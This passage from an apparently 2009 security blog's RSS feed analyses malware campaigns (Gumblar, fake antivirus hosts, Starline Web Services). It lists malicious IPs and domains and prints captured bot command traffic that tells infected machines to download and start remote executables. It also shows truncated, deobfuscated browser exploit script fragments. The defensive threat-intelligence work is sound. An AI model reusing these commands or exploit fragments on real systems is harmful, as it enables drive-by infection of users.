Magic-Number: 1024|1|121:12:234:245:236:103:151:67:93:53:56:150:6:94:36:63:106:66:140:194:113:23:183:92:85:78:68:182:185:205:58:51:217:36:40:198:140:191:10:234:245:66:128:252:160:164:59:10:230:200:205:88:223:132:181:53:210:249:235:140:198:38:191:160:74:231:102:215:167:113:193:156:180:65:152:85:230:211:95:205:155:45:37:123:178:218:176:132:211:156:16:154:194:208:58:13:183:161:228:95:19:166:251:199:232:148:28:206:104:124:155:4:170:193:127:92:155:48:224:111:204:241:10:143:194:69:156:121:231:129:217:250:39:212:194:15:105:223:222:209:92:122:214:6:59:85:98:215:134:67:71:83:53:82:226:247:151:126:113:127:0:74:122:39:31:60:55:136:28:22:90:120:144:48:126:204:134:225:164:12:36:236:95:89:62:65:81:214:192:194:85:193:13:207:232:44:12:32:181:40:54:15:161:199:64:31:148:198:0:57:211:37:38:51:127:100:117:208:59:53:147:144:247:160:96:223:204:108:0:130:149:55:145:54:255:210:86:148:153:87:205:108:124:243:159:252:88:20:204:148:74:96:36:65:0:133:33:205:242:34:79:136:89:225:190:89:179:20:237:77:108:187:185:232:175:89:228:7:110:177:155:185:17:192:251:18:70:29:223:56:63:47:192:153:16:127:243:196:148:224:17:0:155:203:233:74:37:205:82:148:127:238:78:145:174:73:163:244:103:131:45:166:178:238:64:195:110:51:135:2:20:153:2:175:101:235:250:138:185:76:30:57:58:108:202:233:182:110:222:29:241:12:196:164:251:5:103:105:57:239:107:77:136:110:253:237:90:247:120:20:68:150:77:127:3:24:105:186:135:71:216:121:84:156:29:79:162:132:184:219:116:36:40:252:146:37:233:236:29:98:0:97:249:78:225:252:102:74:183:237:146:143:102:231:44:132:54:206:9:239:169:125:19:209:121:166:247:99:146:20:197:147:118:190:225:88:187:72:162:115:54:53:2:157:28:47:33:83:253:42:66:167:167:86:121:33:252:112:133:143:133:75:34:252:9:4:84:197:77:247:56:131:44:59:32:73:106:66:156:104:108:222:15:20:52:136:53:49:249:186:192:126:5:227:122:15:232:207:213:53:198:13:185:242:73:218:59:179:28:216:28:136:182:43:156:235:179:210:28:172:141:220:43:146:192:166:162:168:117:119:222:59:133:151:46:206:113:106:130:142:66:159:23:249:202:180:228:126:134:1:43:19:222:86:166:158:253:73:71:114:193:37:174:70:188:220:21:46:70:152:188:137:55:211:130:2:136:103:128:14:104:171:34:71:2:201:229:255:18:44:114:211:81:32:26:14:253:47:60:67:200:249:205:255:205:79:1:85:182:130:100:31:45:135:102:48:80:76:48:99:121:162:55:203:194:81:217:191:129:22:3:73:16:208:73:222:32:75:51:215:205:152:247:251:31:94:44:112:170:92:211:36:254:10:239:193:91:201:129:221:224:132:38:241:85:112:207:118:188:3:77:137:155:69:133:187:163:178:43:78:14:254:114:13:8:98:206:100:43:79:65:12:212:104:253:42:217:204:160:149:207:238:31:107:51:165:38:214:87:81:36:101:79:151:115:88:249:65:189:37:145:255:49:102:104:46:144:65:250:49:214:202:31:246:53:83:155:91:42:242:172:79:88:252:230:203:85:223:13:19:5:159:18:54:5:123:100:150:189:95:199:147:42:231:138:95:58:37:187:101:24:104:180:112:101:155:60:186:123:74:206:128:233:225:182:239:92:27:133:25:123:77:173:165:52:55:5:111:93:192:213:117:40:137:230:141:37:35:72:160:109:22:33:87:247:216:70:84:243:204:110:111:25:27:20:78:83:25:190:176:218:147:38:2:28:13:144:66:48:217:227:158:239:4:245:231:221:60:60:208:9:170:64:35:198:84:113:25:110:47:202:73:194:240:76:223:254:220:34:46:181:5:205:165:10:195:141:231:0:201:184:9:116:248:44:58:77:158:83:188:206:30:5:145:15:81:113:13:46:147:60:228:153:9:137:163:205:23:138:205:225:67:214:85:59:3:143:136:161:227:69:112:2:74:1:17:156:114:30:202:5:91:174:159:100:56:66:50:79:205:255:49:16:213:134:75:217:22:212:123:250:26:235:252:100:236:14:1:95:44:203:100:135:122:4:236:179:70:30:3:19:30:52:36:243:187:112:205:209:69:72:204:95:51:201:196:32:215:197:127:3:145:228:139:11:232:120:191:46:151:194:66:181:246:103:169:177:215:119:131:28:191:80:123:242:25:63:18:240:4:145:244:149:118:<br />
GET /new/controller.php?action=report&amp;guid=0&amp;rnd=981633&amp;uid=1&amp;entity=1241292389:unique_start;1241530597:unique_start;1241643870:unique_start;1242216620:unique_start;1242765100:unique_start HTTP/1.1</p>
<p>Host: 78.109.29.112<br />
HTTP/1.1 200 OK<br />
Server: nginx<br />
Date: Wed, 20 May 2009 19:58:56 GMT<br />
Content-Type: text/html; charset=utf-8<br />
Connection: close</p>
<p>X-Powered-By: PHP/5.1.6<br />
Content-Length: 0</p>
<p>This next portion is the bot receiving it&#8217;s commands on what files to download next</p>
<p>POST /ld/gen.php HTTP/1.1<br />
Host: nua20090515.com<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1.2600 Service Pack 2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)<br />
Content-type: application/x-www-form-urlencoded<br />
Connection: close<br />
Content-Length: 107</p>
<p>f=0&amp;a=953988293&amp;v=08&amp;c=0&amp;s=ld&amp;l=8174&amp;ck=0&amp;c_fb=0&amp;c_ms=0&amp;c_hi=0&amp;c_be=0&amp;c_fr=-1&amp;c_yb=-1&amp;c_tg=0&amp;c_nl=0&amp;c_fu=-1HTTP/1.1 200 OK<br />
Date: Wed, 20 May 2009 20:37:44 GMT<br />
Server: Apache/1.3.41 (Unix) PHP/5.2.9<br />
X-Powered-By: PHP/5.2.9<br />
Connection: close<br />
Transfer-Encoding: chunked<br />
Content-Type: text/html<br />
9a<br />
#PID=8174<br />
START|http://www.i-site.ph/1/6244.exe<br />
START|http://www.i-site.ph/1/nfr.exe<br />
STARTONCE|http://www.i-site.ph/1/pp.10.exe<br />
WAIT|120<br />
#BLACKLABEL<br />
EXIT<br />
0</p>
<p>Another GET that appears to be a bot check in type request, note the lack of user agent.</p>
<p>GET /v50/?v=66&amp;s=I&amp;uid=953988293&amp;p=8174&amp;q= HTTP/1.0<br />
Host: 85.13.236.154<br />
User-Agent:<br />
HTTP/1.1 200 OK<br />
Date: Wed, 20 May 2009 20:39:28 GMT<br />
Server: Apache/2.2.10 (Fedora)<br />
X-Powered-By: PHP/5.1.6<br />
Cache-Control: no-cache<br />
Work-Server: 85.13.236.154<br />
Content-Length: 0<br />
Connection: close<br />
Content-Type: text/html</p>
<p>That&#8217;s all the analysis I have time for at the moment, this is a very large attack encompasing many malicious payloads. Hopefully more analysis will follow.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sources of Badness &#8211; ZlKon &#8211; Round 2</title>
		<link>http://www.martinsecurity.net/2009/05/12/sources-of-badness-zlkon-round-2fuentes-de-malo-zlkon-vuelta-2/</link>
		<comments>http://www.martinsecurity.net/2009/05/12/sources-of-badness-zlkon-round-2fuentes-de-malo-zlkon-vuelta-2/#comments</comments>
		<pubDate>Tue, 12 May 2009 14:08:04 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[fake av]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[zlkon]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=246</guid>
		<description><![CDATA[It&#8217;s my first day back on the job and I decided to do a little hunting to see what this notorious hosting provider has been up to while I was gone. Unsurprisingly, we saw a large number of attacks from this hosting company. They all appear to be fake anti virus related. Given the age [...]]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s my first day back on the job and I decided to do a little hunting to see what this notorious hosting provider has been up to while I was gone. Unsurprisingly, we saw a large number of attacks from this hosting company. They all appear to be fake anti virus related.</p>
<p>Given the age of some of these events, I won&#8217;t be investigating any in detail but I will keep my eyes peeled for more.</p>
<p>94.247.2.245<br />
3/26/2009    files.ms-load-av.com    /exe/setup_200002.exe</p>
<p>94.247.2.53<br />
4/15/2009    megavipsite.cn    /installing/av/167.exe</p>
<p>94.247.2.84<br />
2/12/2009    files.msas2009-download.com    /test/setup_200002.exe</p>
<p>94.247.3.151<br />
3/25/2009    freewebhostguide.com    /index.php</p>
<p>94.247.3.40<br />
4/24/2009    antivirusquickscanv2.com    /download/Install_2004.exe</p>
<p>94.247.2.195<br />
3/26/2009    94.247.2.195    /news/</p>
<p>94.247.3.151<br />
3/19/2009    zzzz.hostindianet.com    /load.php</p>
<p>94.247.2.215<br />
3/27/2009    yourwebexamine.com    /installer_70127.exe</p>
<p>94.247.3.3<br />
3/12/2009    securityscandirect.com    /download.php</p>
<p>94.247.2.22<br />
4/7/2009    xviewworldmy2.com    /software/8a568adb2c/12205/1/Setup.exe</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/05/12/sources-of-badness-zlkon-round-2fuentes-de-malo-zlkon-vuelta-2/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Sources of Badness &#8211; Still Trade LTD</title>
		<link>http://www.martinsecurity.net/2008/12/22/sources-of-badness-still-trade/</link>
		<comments>http://www.martinsecurity.net/2008/12/22/sources-of-badness-still-trade/#comments</comments>
		<pubDate>Mon, 22 Dec 2008 18:39:13 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=191</guid>
		<description><![CDATA[The absolute worst culprit that I&#8217;ve come across so far in terms of bad IPs is Still Trade LTD from Russia. They have their own /24, AS47486. Out of 34 web servers in their IP block, 30 are bad. Spamhaus has the block blacklisted as a source of crimeware, see their report here. person: Perevitskiy [...]]]></description>
			<content:encoded><![CDATA[<p>The absolute worst culprit that I&#8217;ve come across so far in terms of bad IPs is Still Trade LTD from Russia. They have their own /24, AS47486. Out of 34 web servers in their IP block, 30 are bad. Spamhaus has the block blacklisted as a source of crimeware, see their report <a href="http://www.spamhaus.org/sbl/sbl.lasso?query=SBL66769" target="_blank">here</a>.</p>
<p>person:         Perevitskiy Sergey<br />
address:        Russian Federation,<br />
address:        St. Petersburg, Fedosenko st, 30 liter A, 24-N<br />
mnt-by:         STILLTRADE-MNT<br />
abuse-mailbox:  abuse@still-trade.com<br />
e-mail:         perevitzky.sergey@still-trade.com<br />
phone:          +7 (960) 257-87-90<br />
nic-hdl:        PERE1-RIPE<br />
changed:        lexa@wahome.ru 20080624<br />
source:         RIPE</p>
<p>Still Trade hosts a ton of fake/rogue anti virus domains and applications. We&#8217;ve seen these hosts pop up recently:</p>
<p><strong>91.208.0.220</strong><br />
2008-12-01<br />
scanner.rapidantivirus.com	/setup/setup.exe &#8211; Fake AV</p>
<p><a href="http://www.virustotal.com/analisis/ddaaa11019e101b0cec97868feb4f63a" target="_blank">Trojan:Win32/FakePowav<br />
FraudTool.Win32.ExtraAntivir.c<br />
Win32/FakeAV!generic</a></p>
<p><strong>91.208.0.221</strong><br />
2008-12-11<br />
myprivatetubes09.net	/cd/650/1749/wmpcdcs.exe &#8211; Zlob</p>
<p><a href="http://www.virustotal.com/analisis/70a709dd1196f15b3d6db1a6edd1c2c8" target="_blank">DR/Zlob.Gen<br />
TrojanDownloader:Win32/Renos.HB<br />
Mal/Emogen-G<br />
</a></p>
<p><strong>91.208.0.253</strong><br />
2008-12-03<br />
myprivatetubes2009.net /cd/650/1663/wmpcdcs.exe &#8211; Zlob</p>
<p>Same as above</p>
<p>The following IPs are associated with malicious applications:</p>
<p>91.208.0.220<br />
91.208.0.221<br />
91.208.0.223<br />
91.208.0.224<br />
91.208.0.225<br />
91.208.0.228<br />
91.208.0.229<br />
91.208.0.230<br />
91.208.0.231<br />
91.208.0.234<br />
91.208.0.235<br />
91.208.0.236<br />
91.208.0.237<br />
91.208.0.238<br />
91.208.0.239<br />
91.208.0.240<br />
91.208.0.241<br />
91.208.0.242<br />
91.208.0.243<br />
91.208.0.244<br />
91.208.0.245<br />
91.208.0.246<br />
91.208.0.247<br />
91.208.0.248<br />
91.208.0.249<br />
91.208.0.250<br />
91.208.0.251<br />
91.208.0.252<br />
91.208.0.253<br />
91.208.0.254</p>
<p>BISS also has a <a href="http://www.bluetack.co.uk/forums/index.php?showtopic=18064&amp;st=90&amp;p=88153&amp;#entry88153" target="_blank">comprehensive list of domains and malware</a> being served by these guys.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2008/12/22/sources-of-badness-still-trade/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sources of Badness &#8211; Starline Web Services</title>
		<link>http://www.martinsecurity.net/2008/12/17/sources-of-badness-starline-web-services/</link>
		<comments>http://www.martinsecurity.net/2008/12/17/sources-of-badness-starline-web-services/#comments</comments>
		<pubDate>Wed, 17 Dec 2008 21:50:56 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=177</guid>
		<description><![CDATA[Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for briefly hosting a Srizbi C&#38;C as reported by Fireeye. inetnum: 92.62.101.0 - 92.62.101.255 netname: STARLINE_EE descr: Starline Web Services country: EE admin-c: VN268-RIPE tech-c: VN268-RIPE status: ASSIGNED PA mnt-by: AS39823-MNT changed: roman@compic.ee 20080403 e-mail: info@starline.ee abuse-mailbox: abuse@starline.ee source: [...]]]></description>
			<content:encoded><![CDATA[<p>Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for <a href="http://tech.yahoo.com/news/pcworld/20081127/tc_pcworld/estonianispcutsoffcontrolserversforsrizbibotnet" target="_blank">briefly hosting a Srizbi C&amp;C</a> as reported by <a href="http://blog.fireeye.com/research/2008/11/pushdocutwail-control-servers.html" target="_blank">Fireeye.</a></p>
<pre>inetnum:        92.62.101.0 - 92.62.101.255
netname:        STARLINE_EE
descr:          Starline Web Services
country:        EE
admin-c:        VN268-RIPE
tech-c:         VN268-RIPE
status:         ASSIGNED PA
mnt-by:         AS39823-MNT
changed:        roman@compic.ee 20080403
e-mail:         info@starline.ee
abuse-mailbox:  abuse@starline.ee
source:         RIPE</pre>
<p>The Yahoo article has lots of great information on the relationship between Starline and it&#8217;s upstream providers, so I won&#8217;t delve into that here.</p>
<p>Here are the hits I&#8217;ve seen from their IP space:</p>
<p>92.62.100.0 &#8211; 92.62.101.255</p>
<p><strong>92.62.100.68</strong><br />
2008-11-05<br />
plotfive.cn	/load.php</p>
<p>2008-11-12	 	/cache/doc.pdf</p>
<p>2008-11-22		/cache/doc.pdf</p>
<p><strong>92.62.101.13 </strong><br />
2008-10-24<br />
tgspk.cn	/zpl/pdf.php</p>
<p><strong>92.62.101.53</strong><br />
2008-10-30<br />
blufda.com	/eez3a893/spl/pdf.pdf</p>
<p>2008-11-26 		/u8899r5v/spl/pdf.pdf<br />
/u8899r5v/exe.php</p>
<p>2008-12-17<br />
kraspa.com	/yg6cv7ar/spl/pdf.pdf</p>
<p><strong>92.62.100.44</strong><br />
2008-09-18<br />
92.62.100.44	/1/<br />
/2/<br />
<strong>92.62.100.43</strong><br />
2008-09-17<br />
92.62.100.43	/1/<br />
/2/</p>
<p>There&#8217;s quite a history here. From the looks of things, someone has been<br />
moving around their malware from domain to domain on 92.62.101.53. All<br />
of these sites are down as of this writing except kraspa.com. Lets dive<br />
further into this site.</p>
<p>The first page I saw was kraspa.com	/yg6cv7ar/spl/pdf.pdf however<br />
this is not the whole story. When investigating that exact URL, pdf.pdf<br />
is not found. This is curious as I saw the site earlier today. Backing up<br />
to the root of kraspa.com, we get an index page. The index page contains<br />
an iframe that points to a different directory. The malware author must<br />
have coded his site to rotate directory names based on a certain criteria.<br />
This makes investigation difficult if you can&#8217;t figure out where it will<br />
send victims to next.</p>
<p>The next iframe I got contained:</p>
<p>src=&#8221;/ov9632l9/index.php&#8221;</p>
<p>The next page that comes into play is the exploit script index.php which<br />
is detected as:</p>
<p><a href="http://www.virustotal.com/analisis/faab63a5b6f386690821ea5304aa36ab" target="_blank">Trojan-Downloader.JS.Psyme.alv</a></p>
<p>Decoding the obfuscation reveals exploits for MDAC, Adobe Acrobat and<br />
the Microsoft Access Snapshot viewer. Here&#8217;s some of the script:</p>
<p><em> var p_url = &#8220;http://kraspa.com/ov9632l9/ztt.php&#8221;;<br />
function MDAC(){<br />
</em></p>
<p><em> var nuc=&#8221;;<br />
d8= 0;<br />
var koSZV = document.createElement(&#8220;o&#8221;+nuc+&#8221;b&#8221;+nuc+&#8221;je&#8221;+nuc+&#8221;c&#8221;+nuc+&#8221;t&#8221;);<br />
koSZV.setAttribute(&#8220;id&#8221;,&#8221;&lt;&#8221;+nuc+&#8221;?=k&#8221;+nuc+&#8221;o&#8221;+nuc+&#8221;S&#8221;+nuc+&#8221;ZV?&#8221;+nuc+&#8221;&gt;&#8221;);<br />
[....]<br />
function PDF()<br />
{<br />
document.write(&#8216;&lt;iframe src=&#8221;spl/pdf.pdf&#8221; width=1 height=1 style=&#8221;display:none&#8221;&gt;&lt;/iframe&gt;&#8217;);<br />
[....]<br />
function SS()<br />
{<br />
var arbitrary_file = p_url;<br />
var dest = &#8216;C:/AUTOEXEC.BAT&#8217;;<br />
document.write(&#8220;&lt;object classid=&#8217;clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9&#8242; id=&#8217;attack&#8217;&gt;&lt;/object&gt;&#8221;);<br />
[....]<br />
if (MDAC()||PDF()||SS()) { }</em><br />
Detections for the malicious pdf:</p>
<p><a href="http://www.virustotal.com/analisis/1515251991187a70685a8ffd1f118cfb" target="_blank">JS:Agent-BQ<br />
Exploit.RealPlr.K</a></p>
<p>The payload is a file called ztt.php, here are a few of the detections:</p>
<p><a href="http://www.virustotal.com/analisis/49fcad6c673077efcd345f12f03424ff" target="_blank">Trojan.Win32.Delf.gpg<br />
Troj/Dloadr-BZT<br />
Trojan.Win32.Delf.fyl</a></p>
<p>A quick submission to Threat Expert (<a href="http://www.threatexpert.com/report.aspx?md5=0faec8b68a1840a3221fecc04f919a7c" target="_blank">report</a>) and Anubis (<a href="http://anubis.iseclab.org/?action=result&amp;task_id=1d7454d6dc3c49254352eaeacc44a4465&amp;format=html" target="_blank">report</a>) reveal<br />
further binaries that are downloaded. The .dat files are not exes, but a<br />
type of binary data file.</p>
<table style="background-color:#d0d8e4;" border="0" cellspacing="0" cellpadding="2" width="100%">
<tbody>
<tr>
<td class="TableCell" colspan="2"><strong>From ANUBIS:1033                                     to 92.62.101.53:80 &#8211; [kraspa.com] </strong></td>
</tr>
<tr>
<td class="TableCell">Request: GET /flo/zro.dat</td>
</tr>
<tr>
<td class="TableCell">Response: 200 &#8220;OK&#8221;</td>
</tr>
<tr>
<td class="TableCell">Request: GET /flo/mp.dat</td>
</tr>
<tr>
<td class="TableCell">Response: 200 &#8220;OK&#8221;</td>
</tr>
<tr>
<td class="TableCell">Request: GET /flo/3rkour.dat</td>
</tr>
<tr>
<td class="TableCell">Response: 200 &#8220;OK&#8221;</td>
</tr>
</tbody>
</table>
<p>Of particular interest is 79.143.177.43, another Latvian host with a<br />
small /24 network. Might be worth keeping your eyes open for them too.</p>
<pre>inetnum:        79.143.177.0 - 79.143.177.255
netname:        VDHOST
descr:          VDHost network
org:            ORG-Vs27-RIPE
country:        LV
admin-c:        CINA1-RIPE
tech-c:         CINA1-RIPE
status:         ASSIGNED PA
mnt-by:         IT9812-MNT</pre>
<table style="background-color:#d0d8e4;" border="0" cellspacing="0" cellpadding="2" width="100%">
<tbody>
<tr>
<td class="TableCell" colspan="2"><strong>From ANUBIS:1036                                     to 79.143.177.43:80 &#8211; [79.143.177.43] </strong></td>
</tr>
<tr>
<td class="TableCell">Request: GET /myfiles/95/139/file.exe</td>
</tr>
<tr>
<td class="TableCell">Response: 200 &#8220;OK&#8221;</td>
</tr>
<tr>
<td class="TableCell" colspan="2"><strong> From ANUBIS:1037                                     to 210.83.85.100:80 &#8211; [orzsys.cc] </strong></td>
</tr>
<tr>
<td class="TableCell">Request: GET /files/20026.exe</td>
</tr>
<tr>
<td class="TableCell">Response: 200 &#8220;OK&#8221;</td>
</tr>
</tbody>
</table>
<p>Some detections for 20026.exe, and file.exe:</p>
<p><a href="http://www.virustotal.com/analisis/66971c2f64d6162f8270fba7635e7906" target="_blank">BDS/Hupigon.Gen<br />
Trojan.FakeAlert.Gen!Pac.2</a></p>
<p><a href="http://www.virustotal.com/analisis/07453d142befa44fcbb1fabaaf127a46" target="_blank">Trojan.Crypt.LooksLike.XPACK<br />
Trojan.FakeAlert.Gen!Pac.2</a></p>
<p>The FakeAlert signatures are correct, the threat ultimatly installs some<br />
fake anti virus / anti spyware application.</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2008/12/spyware-big.jpg" target="_blank"><img class="alignnone size-full wp-image-180" title="small" src="http://www.martinsecurity.net/wp-content/uploads/2008/12/small.jpg" alt="small" width="443" height="354" /></a></pre>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2008/12/17/sources-of-badness-starline-web-services/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

